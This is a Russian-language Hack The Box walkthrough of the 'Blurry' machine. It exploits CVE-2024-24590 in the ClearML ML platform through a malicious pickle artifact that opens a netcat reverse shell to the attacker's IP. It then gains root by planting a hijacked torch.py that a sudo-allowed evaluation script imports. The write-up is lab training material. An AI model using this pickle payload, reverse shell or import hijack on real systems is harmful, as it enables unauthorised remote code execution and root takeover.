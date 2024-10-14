Се­год­ня я покажу экс­плу­ата­цию све­жего бага в плат­форме для управле­ния ней­росетя­ми ClearML. Эта уяз­вимость поз­волит нам получить воз­можность уда­лен­ного выпол­нения команд на сер­вере. А затем заюзаем уяз­вимый импорт в прог­рамме на Python и повысим при­виле­гии в Linux.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 19 blurry. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports=$( nmap - p- -- min- rate=500 $1 | grep ^[ 0- 9] | cut - d '/ ' - f 1 | tr '\ n' ', ' | sed s/,$//) nmap - p$ports - A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Наш­лось все­го два откры­тых пор­та:

22 — служ­ба OpenSSH 8.4p1;

80 — веб‑сер­вер Nginx 1.18.0.

В логах Nmap так­же вид­но, что с 80-го пор­та выпол­няет­ся редирект на сайт http:// app. blurry. htb . Добавим новый под­домен в файл / etc/ hosts и прос­мотрим сайт в бра­узе­ре.

10. 10. 11. 19 blurry. htb app. blurry. htb

Нас встре­чает сер­вис ClearML.

Точка входа

ClearML — это фрей­мворк для тре­кин­га ML-экспе­римен­тов, поз­воля­ющий отсле­живать мет­рики машин­ного обу­чения, хра­нить и пре­дос­тавлять по зап­росу модели, вос­про­изво­дить экспе­римен­ты и визу­али­зиро­вать резуль­таты. Вво­дим любое имя и получа­ем дос­туп к панели ClearML.

Пер­вым делом опре­деля­ем вер­сию фрей­мвор­ка. Обыч­но ее мож­но най­ти на стра­нице с нас­трой­ками, в раз­деле опи­сания или в про­филе поль­зовате­ля. В слу­чае с ClearML подошел тре­тий вари­ант.

На­ша вер­сия — 1.13. Про­верим, есть ли для нее готовые экс­пло­иты.

Пер­вая же ссыл­ка из Google выводит нас на CVE-2024-24590.

Точка опоры

В ClearML исполь­зует­ся пакет ClearML для Python, через который про­исхо­дит вза­имо­дей­ствие с сер­вером по API. Этот пакет исполь­зует встро­енный в Python модуль Pickle, отве­чающий за сери­али­зацию и десери­али­зацию объ­ектов. Ата­кующий может соз­дать файл Pickle, содер­жащий про­изволь­ный код, и заг­рузить его в качес­тве арте­фак­та в про­ект через API. Затем при вызове метода get клас­са Artifact файл .pkl будет десери­али­зован, что при­ведет к выпол­нению заложен­ного кода.

Что­бы вос­про­извести эту ата­ку, нам нуж­но нас­тро­ить ClearML локаль­но. Для это­го спер­ва получим кон­фиг в меню Settings ? Workspace ? Create new credentials.

В кон­фиге есть новые под­домены, поэто­му обновля­ем запись в фай­ле / etc/ hosts .

10. 10. 11. 19 blurry. htb app. blurry. htb files. blurry. htb api. blurry. htb

Так как будем работать с ClearML на сво­ей машине, спер­ва нуж­но уста­новить необ­ходимые пакеты.

pip install clearml

А теперь нас­тро­им ClearML. Для это­го запус­тим clearml-init и при зап­росе учет­ных дан­ных вста­вим весь получен­ный кон­фиг.

api { web_server: http:// app. blurry. htb api_server: http:// api. blurry. htb files_server: http:// files. blurry. htb credentials { "access_key" = "9ZJL1UC8DOP3UJJRUJBM" "secret_key" = "fLPHiGutlDvkULEQlo65XlP5azqSvVTlXW7yeKJGf4rjOzAEb4" } }

Для экс­плу­ата­ции уяз­вимос­ти вос­поль­зуем­ся экс­пло­итом, который выпол­нит реверс‑шелл.

from clearml import Task import pickle , os class RunCommand : def __reduce__ ( self ) : return ( os . system , ( ' rm / tmp/ f; mkfifo / tmp/ f; cat / tmp/ f|sh -i 2> & 1|nc 10. 10. 16. 73 4321 >/ tmp/ f ' ,) ) command = RunCommand ( ) task = Task . init ( project_name = ' Black Swan ' , task_name = ' pickle_artifact_upload ' , tags = [ " review " ] ) task . upload_artifact ( name = ' pickle_artifact ' , artifact_object = command , retries = 2 , wait_on_upload = True , extension_name = " . pkl " )

За­пус­тим лис­тенер:

rlwrap nc -nlvp 4321

И выпол­ним код.

Од­нако код не выпол­няет­ся. Нам нуж­но под­гадать момент, ког­да поль­зователь начина­ет работать с про­ектом. Если запус­тить экс­пло­ит в это вре­мя, он сра­бота­ет и мы получим сес­сию на наш лис­тенер.

У нас есть сес­сия поль­зовате­ля jippity , и мы можем заб­рать пер­вый флаг.

Локальное повышение привилегий

Те­перь нам необ­ходимо соб­рать информа­цию. Я буду исполь­зовать для это­го скрип­ты PEASS.

Справка: скрипты PEASS Что делать пос­ле того, как мы получи­ли дос­туп в сис­тему от име­ни поль­зовате­ля? Вари­антов даль­нейшей экс­плу­ата­ции и повыше­ния при­виле­гий может быть очень мно­го, как в Linux, так и в Windows. Что­бы соб­рать информа­цию и наметить цели, мож­но исполь­зовать Privilege Escalation Awesome Scripts SUITE (PEASS) — набор скрип­тов, которые про­веря­ют сис­тему на авто­мате и выда­ют под­робный отчет о потен­циаль­но инте­рес­ных фай­лах, про­цес­сах и нас­трой­ках.

Заг­рузим на уда­лен­ный хост скрипт для Linux, дадим пра­во на выпол­нение и запус­тим ска­ниро­вание. В выводе будет мно­го информа­ции, прой­дем­ся по важ­ным момен­там.

У текуще­го поль­зовате­ля сох­ранен при­ват­ный SSH-ключ / home/ jippity/. ssh/ id_rsa .

Для груп­пы текуще­го поль­зовате­ля дос­тупна запись в каталог / models .

В sudoers есть запись, поз­воля­ющая запус­тить коман­ду / usr/ bin/ evaluate_model / models/ *. pth с высоки­ми при­виле­гиями без вво­да пароля.

Справка: sudoers Файл / etc/ sudoers в Linux содер­жит спис­ки команд, которые раз­ные груп­пы поль­зовате­лей могут выпол­нять от име­ни адми­нис­тра­тора сис­темы. Мож­но прос­мотреть его как нап­рямую, так и при помощи коман­ды sudo -l .

Сох­раня­ем ключ SSH на свою машину, наз­нача­ем пра­ва chmod 0600 id_rsa и под­клю­чаем­ся по SSH. Так мы получим ста­биль­ную пол­ноцен­ную коман­дную обо­лоч­ку.

ssh -i id_ rsa jippity@blurry. htb

Те­перь раз­берем­ся с исполня­емым фай­лом. Ути­лита file сооб­щает, что это обыч­ный скрипт на Bash. Внут­ри скрип­та выпол­няет­ся / models/ evaluate_model. py , которо­му переда­ется файл Pickle.

В катало­ге / models , куда мы име­ем пра­во записи, уже при­сутс­тву­ет pickle-файл demo_model. pth , который мож­но будет исполь­зовать для тес­та.

Про­ана­лизи­руем сам скрипт evaluate_model. py . Сра­зу обра­тим вни­мание на пер­вую стро­ку — import torch . Если мы соз­дадим в катало­ге со скрип­том файл torch. py , то он будет выпол­нен перед всем скрип­том.

В файл torch. py запишем код, который будет запус­кать коман­дную обо­лоч­ку Bash. Так как скрипт запус­тится с высоки­ми при­виле­гиями, при запус­ке evaluate_model соз­дас­тся шелл в кон­тек­сте поль­зовате­ля root.

echo 'import os; os. system( "bash") ' > / models/ torch. py sudo / usr/ bin/ evaluate_ model / models/ demo_ model. pth

Ма­шина зах­вачена!